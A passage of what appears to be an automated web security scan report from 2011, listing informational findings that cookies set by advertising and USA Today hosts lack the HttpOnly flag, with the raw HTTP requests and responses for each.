Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.786652.0XMC
Set-Cookie: C2=kpAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NXAcLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: ROLL=boAnr2C+ORAgA1G9JNnz8yH!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: 46632794=_4dc80a64,1210252042,786652^981604^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 15:38:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0000981
...[SNIP]...

11.50. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39531&partnerID=226&clientID=4716&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjjl0gZcefgJT9Cwcy975nBDKnGwOZc34wAcl3B5iBZGcHM1B4ogqQORcozMTBATRyJ9C+u7eOgO17sRukYGMxkPnkAsjMt7tB+k6CzbjwHUQeOgIiZ4JFmv+DbeQAMpv+gwTudYL07/cDMi/uBQms3Q8y5eU+JgCPhUHM"; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:31:19 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 15:31:19 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1114604&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


11.51. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6544434

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6544434 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1Nk

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:38:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Mon, 07-May-2012 15:38:26 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcg; expires=Wed, 08-May-2013 15:38:26 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.52. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/no-user-image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/no-user-image.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078
If-None-Match: "239c7984ce7dca1:2af"
If-Modified-Since: Tue, 15 Dec 2009 21:35:27 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:08 GMT
Etag: "239c7984ce7dca1:2af"
Connection: close


11.53. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 1381
Content-Type: image/jpeg
Last-Modified: Tue, 18 May 2010 10:44:41 GMT
Accept-Ranges: bytes
ETag: "703011f77f6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

11.54. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "f668327072f6ca1:2af"
If-Modified-Since: Tue, 18 May 2010 10:11:10 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Last-Modified: Tue, 18 May 2010 10:11:10 GMT
Accept-Ranges: bytes
ETag: "f668327072f6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:16 GMT
Connection: close


11.55. http://sitelife.usatoday.com/ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 1638
Content-Type: image/jpeg
Last-Modified: Tue, 18 May 2010 09:52:46 GMT
Accept-Ranges: bytes
ETag: "a08de6ff6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

11.56. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "5385c912cc9ccb1:2af"
If-Modified-Since: Thu, 16 Dec 2010 02:51:01 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Last-Modified: Thu, 16 Dec 2010 02:51:01 GMT
Accept-Ranges: bytes
ETag: "5385c912cc9ccb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:16 GMT
Connection: close


11.57. http://sitelife.usatoday.com/ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "93372a92789cb1:2af"
If-Modified-Since: Sun, 21 Nov 2010 02:56:14 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Last-Modified: Sun, 21 Nov 2010 02:56:14 GMT
Accept-Ranges: bytes
ETag: "93372a92789cb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:16 GMT
Connection: close


11.58. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 6454
Content-Type: image/bmp
Last-Modified: Sun, 27 Feb 2011 04:17:56 GMT
Accept-Ranges: bytes
ETag: "d3da9c4f35d6cb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

BM6.......6...(...(...(..... ...........................................................................................................................................................................
...[SNIP]...

11.59. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 6118
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "ee4b52f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR....... .......<.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..].T.W........@..."DAl@Q...8    .#j61.Dg49g&c.d..3....d..d...1N.D..y.w....c...8.@.FA...AE%.l.Q....._U......N.:U..._.W...{.
...[SNIP]...

11.60. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-background.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 202
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "48ae54f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...lIDATx....    .0..AY..8P.
..].a.3%l.Ww.......D.....J..M    ......r........ 3...... .........2c................O.......l......IEND.B
...[SNIP]...

11.61. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Issue detail

